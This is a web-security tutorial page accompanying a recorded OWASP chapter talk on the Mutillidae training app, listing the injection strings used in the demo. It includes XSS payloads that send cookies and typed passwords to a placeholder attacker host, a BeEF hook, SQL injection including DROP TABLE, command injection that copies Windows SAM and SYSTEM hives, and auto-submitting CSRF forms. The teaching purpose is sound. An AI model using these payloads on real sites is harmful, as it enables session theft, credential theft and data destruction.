A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Affiliates:
ISDPodcast Button
RootSecure Button
Social-engineer-training Button
Irongeek Button

Web Hosting:
Dreamhost Logo
Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle


OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF) (Hacking Illustrated Series InfoSec Tutorial Videos)

OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF)

    This is a recording of the presentation I gave to the Louisville Chapter of OWASP about the Mutillidae project. A while back I wanted to start covering more web application pen-testing tools and concepts in some of my videos and live classes. Of course, I needed vulnerable web apps to illustrate common web security problems. I like the WebGoat project, but sometimes it's a little hard to figure out exactly what they want you to do to exploit a given web application, and it's written in J2EE (not a layman friendly language). In an attempt to have something simple to use as a demo in my videos and in class, I started the Mutillidae project. This is a video covering the first 5 of the OWASP Top 10.

Slides can be found here

 

Owasp Louisville 2nd Meeting from Adrian Crenshaw on Vimeo. The AVI can be downloaded from the Vimeo site, but you will need install the Camstudio codec.

 

XSS code and other stings I injected in the video (provided here for easy copy and pasting):

Simple XSS:
<script>
alert("XSS");</script>

Page Redirect XSS:
<script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing:
<script> new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); </script>

Password Con XSS:
<script>
username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">"); </script>

More complicated, but better looking XSS password form:
<div
style="position: absolute; width: 30%; z-index: 2; left: 35%; top: 40%; float:left; background-color:#C0C0C0" id="loginlayer"> <form method="POST" name="logonf" > <b>You must login to continue</b> <div align="center"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td>User:</td> <td><input name="userf" size="20"></td> </tr> <tr> <td>Password:</td> <td><input type="password" name="passwordf" size="20"></td> </tr> </table> </div> <p align="center"><input type="button" value="Submit" onClick="submitandhide()"></p> </form> <script> function submitandhide() { document.getElementById("loginlayer").style.display = "none"; temprs = "user=" + document.logonf.userf.value + "&password=" + document.logonf.passwordf.value; var iframe = document.createElement('IFRAME'); iframe.src = ("http://attacker.hak/catch.php?" + temprs); document.body.appendChild(iframe); //help from http://www.gnucitizen.org/blog/javascript-remoting-dangers/ } </script> </div>

Clippy XSS:
<div style="position:fixed; right:60px; bottom:10px; overflow:visible;" id="clippy"> <table valign="top" width="130" height="309" border="0" background="http://www.irongeek.com/images/clippy.png" cellpadding="10"> <tr><td valign="top">Hello, it looks like you have an XSS vulnerability, would you like <a href="http://www.owasp.org/index.php/Cross_site_scripting">some help fixing that?</a></td></tr> </table> </div>

External Javascript:
<script
src="http://ha.ckers.org/xss.js"> </script>

Hot BeEF Injection:
<script
language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>

User Agent Example:
<useragentswitcher><useragent description="XSS Test" useragent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0 &lt;script&gt;window.location = &quot;http://www.irongeek.com/&quot;&lt;/script&gt;)" appname="Microsoft Internet Explorer" appversion="4.0 (compatible; MSIE 7.0; Windows NT 6.0)" platform="Win32" vendor="" vendorsub=""/></useragentswitcher>

SQL Injection Strings:
'
'; DROP TABLE owasp10; --
' or 1=1 --
' + password --

Command Injection Strings:
&&
dir
&&
wmic process list
&&
wmic useraccount list
&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
&&
copy C:\Windows\System32\config\RegBack\sam.old && copy C:\Windows\System32\config\RegBack\SYSTEM.OLD

File includes:
at source viewer:
http://target.hak/index.php?page=source-viewer.php
&php_file_name=config.inc

CSRF/XSRF Examples:

IMG get:
<img
src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">

IFRAME Get:
<iframe
src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe>

Post method:
<html>
<body> <form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"> <input type='hidden' name='input_from_form' value="Test of of auto submitted form."> </form> <script> document.csrfform.submit() </script> </body> </html>

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast